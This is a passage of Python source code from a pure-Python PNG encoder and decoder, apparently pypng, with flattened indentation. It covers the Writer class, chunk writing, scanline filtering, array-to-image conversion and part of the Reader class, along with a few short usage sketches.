"small" bit depths (1,2,4) are only allowed with greyscale and
colour mapped images; colour mapped images cannot have bit depth
16.
For colour mapped images (in other words, when the `palette`
argument is specified) the `bitdepth` argument must match one of
the valid PNG bit depths: 1, 2, 4, or 8. (It is valid to have a
PNG image with a palette and an ``sBIT`` chunk, but the meaning
is slightly different; it would be awkward to press the
`bitdepth` argument into service for this.)
The `palette` option, when specified, causes a colour
mapped image to be created: the PNG colour type is set to 3;
`greyscale` must not be set; `alpha` must not be set;
`transparent` must not be set; the bit depth must be 1,2,4,
or 8. When a colour mapped image is created, the pixel values
are palette indexes and the `bitdepth` argument specifies the
size of these indexes (not the size of the colour values in
the palette).
The palette argument value should be a sequence of 3- or
4-tuples. 3-tuples specify RGB palette entries; 4-tuples
specify RGBA palette entries. If both 4-tuples and 3-tuples
appear in the sequence then all the 4-tuples must come
before all the 3-tuples. A ``PLTE`` chunk is created; if there
are 4-tuples then a ``tRNS`` chunk is created as well. The
``PLTE`` chunk will contain all the RGB triples in the same
sequence; the ``tRNS`` chunk will contain the alpha channel for
all the 4-tuples, in the same sequence. Palette entries
are always 8-bit.
If specified, the `transparent` and `background` parameters must
be a tuple with three integer values for red, green, blue, or
a simple integer (or singleton tuple) for a greyscale image.
If specified, the `gamma` parameter must be a positive number
(generally, a `float`). A ``gAMA`` chunk will be created.
Note that this will not change the values of the pixels as
they appear in the PNG file, they are assumed to have already
been converted appropriately for the gamma specified.
The `compression` argument specifies the compression level to
be used by the ``zlib`` module. Values from 1 to 9 specify
compression, with 9 being "more compressed" (usually smaller
and slower, but it doesn't always work out that way). 0 means
no compression. -1 and ``None`` both mean that the default
        level of compression will be picked by the ``zlib`` module
(which is generally acceptable).
If `interlace` is true then an interlaced image is created
        (using PNG's so far only interlace method, *Adam7*). This does
not affect how the pixels should be presented to the encoder,
rather it changes how they are arranged into the PNG file.
On slow connexions interlaced images can be partially decoded
by the browser to give a rough view of the image that is
successively refined as more image data appears.
.. note ::
Enabling the `interlace` option requires the entire image
to be processed in working memory.
`chunk_limit` is used to limit the amount of memory used whilst
compressing the image. In order to avoid using large amounts of
memory, multiple ``IDAT`` chunks may be created.
"""
# At the moment the `planes` argument is ignored;
# its purpose is to act as a dummy so that
# ``Writer(x, y, **info)`` works, where `info` is a dictionary
# returned by Reader.read and friends.
# Ditto for `colormap`.
width, height = check_sizes(size, width, height)
del size
if width <= 0 or height <= 0:
raise ValueError("width and height must be greater than zero")
if not isinteger(width) or not isinteger(height):
raise ValueError("width and height must be integers")
# http://www.w3.org/TR/PNG/#7Integers-and-byte-order
if width > 2**32-1 or height > 2**32-1:
raise ValueError("width and height cannot exceed 2**32-1")
if alpha and transparent is not None:
raise ValueError(
"transparent colour not allowed with alpha channel")
if bytes_per_sample is not None:
warnings.warn('please use bitdepth instead of bytes_per_sample',
DeprecationWarning)
if bytes_per_sample not in (0.125, 0.25, 0.5, 1, 2):
raise ValueError(
"bytes per sample must be .125, .25, .5, 1, or 2")
bitdepth = int(8*bytes_per_sample)
del bytes_per_sample
if not isinteger(bitdepth) or bitdepth < 1 or 16 < bitdepth:
raise ValueError("bitdepth (%r) must be a positive integer <= 16" %
bitdepth)
self.rescale = None
palette = check_palette(palette)
if palette:
if bitdepth not in (1,2,4,8):
raise ValueError("with palette, bitdepth must be 1, 2, 4, or 8")
if transparent is not None:
raise ValueError("transparent and palette not compatible")
if alpha:
raise ValueError("alpha and palette not compatible")
if greyscale:
raise ValueError("greyscale and palette not compatible")
else:
# No palette, check for sBIT chunk generation.
if alpha or not greyscale:
if bitdepth not in (8,16):
targetbitdepth = (8,16)[bitdepth > 8]
self.rescale = (bitdepth, targetbitdepth)
bitdepth = targetbitdepth
del targetbitdepth
else:
assert greyscale
assert not alpha
if bitdepth not in (1,2,4,8,16):
if bitdepth > 8:
targetbitdepth = 16
elif bitdepth == 3:
targetbitdepth = 4
else:
assert bitdepth in (5,6,7)
targetbitdepth = 8
self.rescale = (bitdepth, targetbitdepth)
bitdepth = targetbitdepth
del targetbitdepth
if bitdepth < 8 and (alpha or not greyscale and not palette):
raise ValueError(
"bitdepth < 8 only permitted with greyscale or palette")
if bitdepth > 8 and palette:
raise ValueError(
"bit depth must be 8 or less for images with palette")
transparent = check_color(transparent, greyscale, 'transparent')
background = check_color(background, greyscale, 'background')
# It's important that the true boolean values (greyscale, alpha,
# colormap, interlace) are converted to bool because Iverson's
# convention is relied upon later on.
self.width = width
self.height = height
self.transparent = transparent
self.background = background
self.gamma = gamma
self.greyscale = bool(greyscale)
self.alpha = bool(alpha)
self.colormap = bool(palette)
self.bitdepth = int(bitdepth)
self.compression = compression
self.chunk_limit = chunk_limit
self.interlace = bool(interlace)
self.palette = palette
self.x_pixels_per_unit = x_pixels_per_unit
self.y_pixels_per_unit = y_pixels_per_unit
self.unit_is_meter = bool(unit_is_meter)
self.color_type = 4*self.alpha + 2*(not greyscale) + 1*self.colormap
assert self.color_type in (0,2,3,4,6)
self.color_planes = (3,1)[self.greyscale or self.colormap]
self.planes = self.color_planes + self.alpha
# :todo: fix for bitdepth < 8
self.psize = (self.bitdepth/8) * self.planes
def make_palette(self):
"""Create the byte sequences for a ``PLTE`` and if necessary a
``tRNS`` chunk. Returned as a pair (*p*, *t*). *t* will be
``None`` if no ``tRNS`` chunk is necessary.
"""
p = array('B')
t = array('B')
for x in self.palette:
p.extend(x[0:3])
if len(x) > 3:
t.append(x[3])
p = tostring(p)
t = tostring(t)
if t:
return p,t
return p,None
def write(self, outfile, rows):
"""Write a PNG image to the output file. `rows` should be
an iterable that yields each row in boxed row flat pixel
format. The rows should be the rows of the original image,
so there should be ``self.height`` rows of ``self.width *
self.planes`` values. If `interlace` is specified (when
creating the instance), then an interlaced PNG file will
be written. Supply the rows in the normal image order;
the interlacing is carried out internally.
.. note ::
Interlacing will require the entire image to be in working
memory.
"""
if self.interlace:
fmt = 'BH'[self.bitdepth > 8]
a = array(fmt, itertools.chain(*rows))
return self.write_array(outfile, a)
nrows = self.write_passes(outfile, rows)
if nrows != self.height:
raise ValueError(
"rows supplied (%d) does not match height (%d)" %
(nrows, self.height))
def write_passes(self, outfile, rows, packed=False):
"""
Write a PNG image to the output file.
Most users are expected to find the :meth:`write` or
:meth:`write_array` method more convenient.
The rows should be given to this method in the order that
they appear in the output file. For straightlaced images,
this is the usual top to bottom ordering, but for interlaced
images the rows should have already been interlaced before
passing them to this function.
`rows` should be an iterable that yields each row. When
`packed` is ``False`` the rows should be in boxed row flat pixel
format; when `packed` is ``True`` each row should be a packed
sequence of bytes.
"""
# http://www.w3.org/TR/PNG/#5PNG-file-signature
outfile.write(_signature)
# http://www.w3.org/TR/PNG/#11IHDR
write_chunk(outfile, b'IHDR',
struct.pack("!2I5B", int(self.width), int(self.height),
self.bitdepth, int(self.color_type),
0, 0, int(self.interlace)))
# See :chunk:order
# http://www.w3.org/TR/PNG/#11gAMA
if self.gamma is not None:
write_chunk(outfile, b'gAMA',
struct.pack("!L", int(round(self.gamma*1e5))))
# See :chunk:order
# http://www.w3.org/TR/PNG/#11sBIT
if self.rescale:
write_chunk(outfile, b'sBIT',
struct.pack('%dB' % self.planes,
*[self.rescale[0]]*self.planes))
# :chunk:order: Without a palette (PLTE chunk), ordering is
# relatively relaxed. With one, gAMA chunk must precede PLTE
# chunk which must precede tRNS and bKGD.
# See http://www.w3.org/TR/PNG/#5ChunkOrdering
if self.palette:
p,t = self.make_palette()
write_chunk(outfile, b'PLTE', p)
if t:
# tRNS chunk is optional. Only needed if palette entries
# have alpha.
write_chunk(outfile, b'tRNS', t)
# http://www.w3.org/TR/PNG/#11tRNS
if self.transparent is not None:
if self.greyscale:
write_chunk(outfile, b'tRNS',
struct.pack("!1H", *self.transparent))
else:
write_chunk(outfile, b'tRNS',
struct.pack("!3H", *self.transparent))
# http://www.w3.org/TR/PNG/#11bKGD
if self.background is not None:
if self.greyscale:
write_chunk(outfile, b'bKGD',
struct.pack("!1H", *self.background))
else:
write_chunk(outfile, b'bKGD',
struct.pack("!3H", *self.background))
# http://www.w3.org/TR/PNG/#11pHYs
if self.x_pixels_per_unit is not None and self.y_pixels_per_unit is not None:
tup = (self.x_pixels_per_unit, self.y_pixels_per_unit, int(self.unit_is_meter))
write_chunk(outfile, b'pHYs', struct.pack("!LLB",*tup))
# http://www.w3.org/TR/PNG/#11IDAT
if self.compression is not None:
compressor = zlib.compressobj(self.compression)
else:
compressor = zlib.compressobj()
# Choose an extend function based on the bitdepth. The extend
# function packs/decomposes the pixel values into bytes and
# stuffs them onto the data array.
data = array('B')
if self.bitdepth == 8 or packed:
extend = data.extend
elif self.bitdepth == 16:
# Decompose into bytes
def extend(sl):
fmt = '!%dH' % len(sl)
data.extend(array('B', struct.pack(fmt, *sl)))
else:
# Pack into bytes
assert self.bitdepth < 8
# samples per byte
spb = int(8/self.bitdepth)
def extend(sl):
a = array('B', sl)
# Adding padding bytes so we can group into a whole
# number of spb-tuples.
l = float(len(a))
extra = math.ceil(l / float(spb))*spb - l
a.extend([0]*int(extra))
# Pack into bytes
l = group(a, spb)
l = [reduce(lambda x,y:
(x << self.bitdepth) + y, e) for e in l]
data.extend(l)
if self.rescale:
oldextend = extend
factor = \
float(2**self.rescale[1]-1) / float(2**self.rescale[0]-1)
def extend(sl):
oldextend([int(round(factor*x)) for x in sl])
# Build the first row, testing mostly to see if we need to
# changed the extend function to cope with NumPy integer types
# (they cause our ordinary definition of extend to fail, so we
# wrap it). See
# http://code.google.com/p/pypng/issues/detail?id=44
enumrows = enumerate(rows)
del rows
# First row's filter type.
data.append(0)
# :todo: Certain exceptions in the call to ``.next()`` or the
# following try would indicate no row data supplied.
# Should catch.
i,row = next(enumrows)
try:
# If this fails...
extend(row)
except:
# ... try a version that converts the values to int first.
# Not only does this work for the (slightly broken) NumPy
# types, there are probably lots of other, unknown, "nearly"
# int types it works for.
def wrapmapint(f):
return lambda sl: f([int(x) for x in sl])
extend = wrapmapint(extend)
del wrapmapint
extend(row)
for i,row in enumrows:
# Add "None" filter type. Currently, it's essential that
# this filter type be used for every scanline as we do not
# mark the first row of a reduced pass image; that means we
# could accidentally compute the wrong filtered scanline if
# we used "up", "average", or "paeth" on such a line.
data.append(0)
extend(row)
if len(data) > self.chunk_limit:
compressed = compressor.compress(tostring(data))
if len(compressed):
write_chunk(outfile, b'IDAT', compressed)
# Because of our very witty definition of ``extend``,
# above, we must re-use the same ``data`` object. Hence
# we use ``del`` to empty this one, rather than create a
# fresh one (which would be my natural FP instinct).
del data[:]
if len(data):
compressed = compressor.compress(tostring(data))
else:
compressed = b''
flushed = compressor.flush()
if len(compressed) or len(flushed):
write_chunk(outfile, b'IDAT', compressed + flushed)
# http://www.w3.org/TR/PNG/#11IEND
write_chunk(outfile, b'IEND')
return i+1
def write_array(self, outfile, pixels):
"""
Write an array in flat row flat pixel format as a PNG file on
the output file. See also :meth:`write` method.
"""
if self.interlace:
self.write_passes(outfile, self.array_scanlines_interlace(pixels))
else:
self.write_passes(outfile, self.array_scanlines(pixels))
def write_packed(self, outfile, rows):
"""
Write PNG file to `outfile`. The pixel data comes from `rows`
which should be in boxed row packed format. Each row should be
a sequence of packed bytes.
Technically, this method does work for interlaced images but it
is best avoided. For interlaced images, the rows should be
presented in the order that they appear in the file.
This method should not be used when the source image bit depth
is not one naturally supported by PNG; the bit depth should be
1, 2, 4, 8, or 16.
"""
if self.rescale:
raise Error("write_packed method not suitable for bit depth %d" %
self.rescale[0])
return self.write_passes(outfile, rows, packed=True)
def convert_pnm(self, infile, outfile):
"""
Convert a PNM file containing raw pixel data into a PNG file
with the parameters set in the writer object. Works for
(binary) PGM, PPM, and PAM formats.
"""
if self.interlace:
pixels = array('B')
pixels.fromfile(infile,
(self.bitdepth/8) * self.color_planes *
self.width * self.height)
self.write_passes(outfile, self.array_scanlines_interlace(pixels))
else:
self.write_passes(outfile, self.file_scanlines(infile))
def convert_ppm_and_pgm(self, ppmfile, pgmfile, outfile):
"""
Convert a PPM and PGM file containing raw pixel data into a
PNG outfile with the parameters set in the writer object.
"""
pixels = array('B')
pixels.fromfile(ppmfile,
(self.bitdepth/8) * self.color_planes *
self.width * self.height)
apixels = array('B')
apixels.fromfile(pgmfile,
(self.bitdepth/8) *
self.width * self.height)
pixels = interleave_planes(pixels, apixels,
(self.bitdepth/8) * self.color_planes,
(self.bitdepth/8))
if self.interlace:
self.write_passes(outfile, self.array_scanlines_interlace(pixels))
else:
self.write_passes(outfile, self.array_scanlines(pixels))
def file_scanlines(self, infile):
"""
Generates boxed rows in flat pixel format, from the input file
`infile`. It assumes that the input file is in a "Netpbm-like"
binary format, and is positioned at the beginning of the first
pixel. The number of pixels to read is taken from the image
dimensions (`width`, `height`, `planes`) and the number of bytes
per value is implied by the image `bitdepth`.
"""
# Values per row
vpr = self.width * self.planes
row_bytes = vpr
if self.bitdepth > 8:
assert self.bitdepth == 16
row_bytes *= 2
fmt = '>%dH' % vpr
def line():
return array('H', struct.unpack(fmt, infile.read(row_bytes)))
else:
def line():
scanline = array('B', infile.read(row_bytes))
return scanline
for y in range(self.height):
yield line()
def array_scanlines(self, pixels):
"""
Generates boxed rows (flat pixels) from flat rows (flat pixels)
in an array.
"""
# Values per row
vpr = self.width * self.planes
stop = 0
for y in range(self.height):
start = stop
stop = start + vpr
yield pixels[start:stop]
def array_scanlines_interlace(self, pixels):
"""
Generator for interlaced scanlines from an array. `pixels` is
the full source image in flat row flat pixel format. The
generator yields each scanline of the reduced passes in turn, in
boxed row flat pixel format.
"""
# http://www.w3.org/TR/PNG/#8InterlaceMethods
# Array type.
fmt = 'BH'[self.bitdepth > 8]
# Value per row
vpr = self.width * self.planes
for xstart, ystart, xstep, ystep in _adam7:
if xstart >= self.width:
continue
# Pixels per row (of reduced image)
ppr = int(math.ceil((self.width-xstart)/float(xstep)))
# number of values in reduced image row.
row_len = ppr*self.planes
for y in range(ystart, self.height, ystep):
if xstep == 1:
offset = y * vpr
yield pixels[offset:offset+vpr]
else:
row = array(fmt)
# There's no easier way to set the length of an array
row.extend(pixels[0:row_len])
offset = y * vpr + xstart * self.planes
end_offset = (y+1) * vpr
skip = self.planes * xstep
for i in range(self.planes):
row[i::self.planes] = \
pixels[offset+i:end_offset:skip]
yield row
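# --- Illustrative sketch (not part of the original module) ---
# Minimal use of the Writer class whose methods are documented above: write
# a 2x2 greyscale image from boxed rows.  It assumes the Writer constructor
# (defined earlier in this module, as in pypng) accepts width/height/
# greyscale/bitdepth keywords; the function name and filename are invented.
def _example_writer(filename='checker.png'):
    w = Writer(width=2, height=2, greyscale=True, bitdepth=8)
    rows = [[0, 255], [255, 0]]          # boxed row flat pixel format
    with open(filename, 'wb') as f:
        w.write(f, rows)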
def write_chunk(outfile, tag, data=b''):
"""
Write a PNG chunk to the output file, including length and
checksum.
"""
# http://www.w3.org/TR/PNG/#5Chunk-layout
outfile.write(struct.pack("!I", len(data)))
outfile.write(tag)
outfile.write(data)
checksum = zlib.crc32(tag)
checksum = zlib.crc32(data, checksum)
checksum &= 2**32-1
outfile.write(struct.pack("!I", checksum))
def write_chunks(out, chunks):
"""Create a PNG file by writing out the chunks."""
out.write(_signature)
for chunk in chunks:
write_chunk(out, *chunk)
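# --- Illustrative sketch (not part of the original module) ---
# write_chunk/write_chunks, above, handle the length and CRC bookkeeping, so
# a complete (if tiny) PNG can be assembled by hand: a 1x1 8-bit greyscale
# image needs only IHDR, one IDAT, and IEND.  The function name and default
# filename are invented for the example.
def _example_write_minimal_png(filename='tiny.png'):
    ihdr = struct.pack("!2I5B", 1, 1, 8, 0, 0, 0, 0)  # 1x1, bit depth 8, colour type 0
    idat = zlib.compress(b'\x00\x00')                 # filter byte 0 + one black sample
    with open(filename, 'wb') as f:
        write_chunks(f, [(b'IHDR', ihdr), (b'IDAT', idat), (b'IEND', b'')])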
def filter_scanline(type, line, fo, prev=None):
"""Apply a scanline filter to a scanline. `type` specifies the
filter type (0 to 4); `line` specifies the current (unfiltered)
scanline as a sequence of bytes; `prev` specifies the previous
(unfiltered) scanline as a sequence of bytes. `fo` specifies the
filter offset; normally this is size of a pixel in bytes (the number
of bytes per sample times the number of channels), but when this is
< 1 (for bit depths < 8) then the filter offset is 1.
"""
assert 0 <= type < 5
# The output array. Which, pathetically, we extend one-byte at a
# time (fortunately this is linear).
out = array('B', [type])
def sub():
ai = -fo
for x in line:
if ai >= 0:
x = (x - line[ai]) & 0xff
out.append(x)
ai += 1
def up():
for i,x in enumerate(line):
x = (x - prev[i]) & 0xff
out.append(x)
def average():
ai = -fo
for i,x in enumerate(line):
if ai >= 0:
x = (x - ((line[ai] + prev[i]) >> 1)) & 0xff
else:
x = (x - (prev[i] >> 1)) & 0xff
out.append(x)
ai += 1
def paeth():
# http://www.w3.org/TR/PNG/#9Filter-type-4-Paeth
ai = -fo # also used for ci
for i,x in enumerate(line):
a = 0
b = prev[i]
c = 0
if ai >= 0:
a = line[ai]
c = prev[ai]
p = a + b - c
pa = abs(p - a)
pb = abs(p - b)
pc = abs(p - c)
if pa <= pb and pa <= pc:
Pr = a
elif pb <= pc:
Pr = b
else:
Pr = c
x = (x - Pr) & 0xff
out.append(x)
ai += 1
if not prev:
# We're on the first line. Some of the filters can be reduced
# to simpler cases which makes handling the line "off the top"
# of the image simpler. "up" becomes "none"; "paeth" becomes
# "left" (non-trivial, but true). "average" needs to be handled
# specially.
if type == 2: # "up"
type = 0
elif type == 3:
prev = [0]*len(line)
elif type == 4: # "paeth"
type = 1
if type == 0:
out.extend(line)
elif type == 1:
sub()
elif type == 2:
up()
elif type == 3:
average()
else: # type == 4
paeth()
return out
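# --- Illustrative sketch (not part of the original module) ---
# filter_scanline, above, prepends the filter-type byte and filters the raw
# scanline.  A tiny demonstration of the "sub" filter (type 1) on one row of
# two RGB pixels (filter offset fo=3); the byte values are arbitrary.
def _example_filter_scanline():
    line = array('B', [12, 11, 10, 22, 21, 20])
    # First pixel is copied; the second is stored as a difference from the
    # first: array('B', [1, 12, 11, 10, 10, 10, 10]).
    return filter_scanline(1, line, 3)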
def from_array(a, mode=None, info={}):
"""Create a PNG :class:`Image` object from a 2- or 3-dimensional
array. One application of this function is easy PIL-style saving:
``png.from_array(pixels, 'L').save('foo.png')``.
Unless they are specified using the *info* parameter, the PNG's
height and width are taken from the array size. For a 3 dimensional
array the first axis is the height; the second axis is the width;
and the third axis is the channel number. Thus an RGB image that is
16 pixels high and 8 wide will use an array that is 16x8x3. For 2
dimensional arrays the first axis is the height, but the second axis
is ``width*channels``, so an RGB image that is 16 pixels high and 8
wide will use a 2-dimensional array that is 16x24 (each row will be
8*3 = 24 sample values).
*mode* is a string that specifies the image colour format in a
PIL-style mode. It can be:
``'L'``
greyscale (1 channel)
``'LA'``
greyscale with alpha (2 channel)
``'RGB'``
colour image (3 channel)
``'RGBA'``
colour image with alpha (4 channel)
The mode string can also specify the bit depth (overriding how this
function normally derives the bit depth, see below). Appending
``';16'`` to the mode will cause the PNG to be 16 bits per channel;
any decimal from 1 to 16 can be used to specify the bit depth.
When a 2-dimensional array is used *mode* determines how many
channels the image has, and so allows the width to be derived from
the second array dimension.
The array is expected to be a ``numpy`` array, but it can be any
suitable Python sequence. For example, a list of lists can be used:
``png.from_array([[0, 255, 0], [255, 0, 255]], 'L')``. The exact
rules are: ``len(a)`` gives the first dimension, height;
``len(a[0])`` gives the second dimension; ``len(a[0][0])`` gives the
third dimension, unless an exception is raised in which case a
2-dimensional array is assumed. It's slightly more complicated than
that because an iterator of rows can be used, and it all still
works. Using an iterator allows data to be streamed efficiently.
The bit depth of the PNG is normally taken from the array element's
datatype (but if *mode* specifies a bitdepth then that is used
instead). The array element's datatype is determined in a way which
is supposed to work both for ``numpy`` arrays and for Python
``array.array`` objects. A 1 byte datatype will give a bit depth of
8, a 2 byte datatype will give a bit depth of 16. If the datatype
does not have an implicit size, for example it is a plain Python
list of lists, as above, then a default of 8 is used.
The *info* parameter is a dictionary that can be used to specify
metadata (in the same style as the arguments to the
:class:`png.Writer` class). For this function the keys that are
useful are:
height
overrides the height derived from the array dimensions and allows
*a* to be an iterable.
width
overrides the width derived from the array dimensions.
bitdepth
overrides the bit depth derived from the element datatype (but
must match *mode* if that also specifies a bit depth).
Generally anything specified in the
*info* dictionary will override any implicit choices that this
function would otherwise make, but must match any explicit ones.
For example, if the *info* dictionary has a ``greyscale`` key then
this must be true when mode is ``'L'`` or ``'LA'`` and false when
mode is ``'RGB'`` or ``'RGBA'``.
"""
# We abuse the *info* parameter by modifying it. Take a copy here.
# (Also typechecks *info* to some extent).
info = dict(info)
# Syntax check mode string.
bitdepth = None
try:
# Assign the 'L' or 'RGBA' part to `gotmode`.
if mode.startswith('L'):
gotmode = 'L'
mode = mode[1:]
elif mode.startswith('RGB'):
gotmode = 'RGB'
mode = mode[3:]
else:
raise Error()
if mode.startswith('A'):
gotmode += 'A'
mode = mode[1:]
# Skip any optional ';'
while mode.startswith(';'):
mode = mode[1:]
# Parse optional bitdepth
if mode:
try:
bitdepth = int(mode)
except (TypeError, ValueError):
raise Error()
except Error:
raise Error("mode string should be 'RGB' or 'L;16' or similar.")
mode = gotmode
# Get bitdepth from *mode* if possible.
if bitdepth:
if info.get('bitdepth') and bitdepth != info['bitdepth']:
raise Error("mode bitdepth (%d) should match info bitdepth (%d)." %
(bitdepth, info['bitdepth']))
info['bitdepth'] = bitdepth
# Fill in and/or check entries in *info*.
# Dimensions.
if 'size' in info:
# Check width, height, size all match where used.
for dimension,axis in [('width', 0), ('height', 1)]:
if dimension in info:
if info[dimension] != info['size'][axis]:
raise Error(
"info[%r] should match info['size'][%r]." %
(dimension, axis))
info['width'],info['height'] = info['size']
if 'height' not in info:
try:
l = len(a)
except TypeError:
raise Error(
"len(a) does not work, supply info['height'] instead.")
info['height'] = l
# Colour format.
if 'greyscale' in info:
if bool(info['greyscale']) != ('L' in mode):
raise Error("info['greyscale'] should match mode.")
info['greyscale'] = 'L' in mode
if 'alpha' in info:
if bool(info['alpha']) != ('A' in mode):
raise Error("info['alpha'] should match mode.")
info['alpha'] = 'A' in mode
planes = len(mode)
if 'planes' in info:
if info['planes'] != planes:
raise Error("info['planes'] should match mode.")
    # In order to work out whether the array is 2D or 3D we need its
# first row, which requires that we take a copy of its iterator.
# We may also need the first row to derive width and bitdepth.
a,t = itertools.tee(a)
row = next(t)
del t
try:
row[0][0]
threed = True
testelement = row[0]
except (IndexError, TypeError):
threed = False
testelement = row
if 'width' not in info:
if threed:
width = len(row)
else:
width = len(row) // planes
info['width'] = width
if threed:
# Flatten the threed rows
a = (itertools.chain.from_iterable(x) for x in a)
if 'bitdepth' not in info:
try:
dtype = testelement.dtype
# goto the "else:" clause. Sorry.
except AttributeError:
try:
# Try a Python array.array.
bitdepth = 8 * testelement.itemsize
except AttributeError:
# We can't determine it from the array element's
# datatype, use a default of 8.
bitdepth = 8
else:
# If we got here without exception, we now assume that
# the array is a numpy array.
if dtype.kind == 'b':
bitdepth = 1
else:
bitdepth = 8 * dtype.itemsize
info['bitdepth'] = bitdepth
for thing in 'width height bitdepth greyscale alpha'.split():
assert thing in info
return Image(a, info)
# So that refugees from PIL feel more at home.  Not documented.
fromarray = from_array
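# --- Illustrative sketch (not part of the original module) ---
# Two common calls described by the from_array docstring above; the output
# filenames are invented for the example.
def _example_from_array():
    # 3x1 greyscale image from a 2-D list (mode 'L', default bit depth 8).
    from_array([[0, 128, 255]], 'L').save('grey.png')
    # 1x1 RGB image, 16 bits per channel, height given explicitly.
    from_array([[0, 65535, 0]], 'RGB;16', info={'height': 1}).save('green.png')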
class Image:
"""A PNG image. You can create an :class:`Image` object from
an array of pixels by calling :meth:`png.from_array`. It can be
saved to disk with the :meth:`save` method.
"""
def __init__(self, rows, info):
"""
.. note ::
The constructor is not public. Please do not call it.
"""
self.rows = rows
self.info = info
def save(self, file):
"""Save the image to *file*. If *file* looks like an open file
descriptor then it is used, otherwise it is treated as a
filename and a fresh file is opened.
In general, you can only call this method once; after it has
been called the first time and the PNG image has been saved, the
source data will have been streamed, and cannot be streamed
again.
"""
w = Writer(**self.info)
try:
file.write
def close(): pass
except AttributeError:
file = open(file, 'wb')
def close(): file.close()
try:
w.write(file, self.rows)
finally:
close()
class _readable:
"""
A simple file-like interface for strings and arrays.
"""
def __init__(self, buf):
self.buf = buf
self.offset = 0
def read(self, n):
r = self.buf[self.offset:self.offset+n]
if isarray(r):
r = r.tostring()
self.offset += n
return r
try:
str(b'dummy', 'ascii')
except TypeError:
as_str = str
else:
def as_str(x):
return str(x, 'ascii')
class Reader:
"""
PNG decoder in pure Python.
"""
def __init__(self, _guess=None, **kw):
"""
Create a PNG decoder object.
The constructor expects exactly one keyword argument. If you
supply a positional argument instead, it will guess the input
type. You can choose among the following keyword arguments:
filename
Name of input file (a PNG file).
file
A file-like object (object with a read() method).
bytes
``array`` or ``string`` with PNG data.
"""
if ((_guess is not None and len(kw) != 0) or
(_guess is None and len(kw) != 1)):
raise TypeError("Reader() takes exactly 1 argument")
# Will be the first 8 bytes, later on. See validate_signature.
self.signature = None
self.transparent = None
# A pair of (len,type) if a chunk has been read but its data and
# checksum have not (in other words the file position is just
# past the 4 bytes that specify the chunk type). See preamble
# method for how this is used.
self.atchunk = None
if _guess is not None:
if isarray(_guess):
kw["bytes"] = _guess
elif isinstance(_guess, str):
kw["filename"] = _guess
elif hasattr(_guess, 'read'):
kw["file"] = _guess
if "filename" in kw:
self.file = open(kw["filename"], "rb")
elif "file" in kw:
self.file = kw["file"]
elif "bytes" in kw:
self.file = _readable(kw["bytes"])
else:
raise TypeError("expecting filename, file or bytes array")
def chunk(self, seek=None, lenient=False):
"""
Read the next PNG chunk from the input file; returns a
(*type*, *data*) tuple. *type* is the chunk's type as a
byte string (all PNG chunk types are 4 bytes long).
*data* is the chunk's data content, as a byte string.
If the optional `seek` argument is
specified then it will keep reading chunks until it either runs
out of file or finds the type specified by the argument. Note
that in general the order of chunks in PNGs is unspecified, so
using `seek` can cause you to miss chunks.
If the optional `lenient` argument evaluates to `True`,
checksum failures will raise warnings rather than exceptions.
"""
self.validate_signature()
while True:
# http://www.w3.org/TR/PNG/#5Chunk-layout
if not self.atchunk:
self.atchunk = self.chunklentype()
length, type = self.atchunk
self.atchunk = None
data = self.file.read(length)
if len(data) != length:
raise ChunkError('Chunk %s too short for required %i octets.'
% (type, length))
checksum = self.file.read(4)
if len(checksum) != 4:
raise ChunkError('Chunk %s too short for checksum.' % type)
if seek and type != seek:
continue
verify = zlib.crc32(type)
verify = zlib.crc32(data, verify)
# Whether the output from zlib.crc32 is signed or not varies
# according to hideous implementation details, see
# http://bugs.python.org/issue1202 .
# We coerce it to be positive here (in a way which works on
# Python 2.3 and older).
verify &= 2**32 - 1
verify = struct.pack('!I', verify)
if checksum != verify:
(a, ) = struct.unpack('!I', checksum)
(b, ) = struct.unpack('!I', verify)
message = "Checksum error in %s chunk: 0x%08X != 0x%08X." % (type, a, b)
if lenient:
warnings.warn(message, RuntimeWarning)
else:
raise ChunkError(message)
return type, data
def chunks(self):
"""Return an iterator that will yield each chunk as a
(*chunktype*, *content*) pair.
"""
while True:
t,v = self.chunk()
yield t,v
if t == b'IEND':
break
def undo_filter(self, filter_type, scanline, previous):
"""Undo the filter for a scanline. `scanline` is a sequence of
bytes that does not include the initial filter type byte.
        `previous` is the decoded previous scanline (for straightlaced
images this is the previous pixel row, but for interlaced
images, it is the previous scanline in the reduced image, which
in general is not the previous pixel row in the final image).
When there is no previous scanline (the first row of a
straightlaced image, or the first row in one of the passes in an
interlaced image), then this argument should be ``None``.
The scanline will have the effects of filtering removed, and the
result will be returned as a fresh sequence of bytes.
"""
# :todo: Would it be better to update scanline in place?
# Yes, with the Cython extension making the undo_filter fast,
# updating scanline inplace makes the code 3 times faster
# (reading 50 images of 800x800 went from 40s to 16s)
result = scanline
if filter_type == 0:
return result
if filter_type not in (1,2,3,4):
raise FormatError('Invalid PNG Filter Type.'
' See http://www.w3.org/TR/2003/REC-PNG-20031110/#9Filters .')
# Filter unit. The stride from one pixel to the corresponding
# byte from the previous pixel. Normally this is the pixel
# size in bytes, but when this is smaller than 1, the previous
# byte is used instead.
fu = max(1, self.psize)
# For the first line of a pass, synthesize a dummy previous
# line. An alternative approach would be to observe that on the
# first line 'up' is the same as 'null', 'paeth' is the same
# as 'sub', with only 'average' requiring any special case.
if not previous:
previous = array('B', [0]*len(scanline))
def sub():
"""Undo sub filter."""
ai = 0
# Loop starts at index fu. Observe that the initial part
# of the result is already filled in correctly with
# scanline.
for i in range(fu, len(result)):
x = scanline[i]
a = result[ai]
result[i] = (x + a) & 0xff
ai += 1
def up():
"""Undo up filter."""
for i in range(len(result)):
x = scanline[i]
b = previous[i]
result[i] = (x + b) & 0xff
def average():
"""Undo average filter."""
ai = -fu
for i in range(len(result)):
x = scanline[i]
if ai < 0:
a = 0
else:
a = result[ai]
b = previous[i]
result[i] = (x + ((a + b) >> 1)) & 0xff
ai += 1
def paeth():
"""Undo Paeth filter."""
# Also used for ci.
ai = -fu
for i in range(len(result)):
x = scanline[i]
if ai < 0:
a = c = 0
else:
a = result[ai]
c = previous[ai]
b = previous[i]
p = a + b - c
pa = abs(p - a)
pb = abs(p - b)
pc = abs(p - c)
if pa <= pb and pa <= pc:
pr = a
elif pb <= pc:
pr = b
else:
pr = c
result[i] = (x + pr) & 0xff
ai += 1
# Call appropriate filter algorithm. Note that 0 has already
# been dealt with.
(None,
pngfilters.undo_filter_sub,
pngfilters.undo_filter_up,
pngfilters.undo_filter_average,
pngfilters.undo_filter_paeth)[filter_type](fu, scanline, previous, result)
return result
def deinterlace(self, raw):
"""
Read raw pixel data, undo filters, deinterlace, and flatten.
Return in flat row flat pixel format.
"""
# Values per row (of the target image)
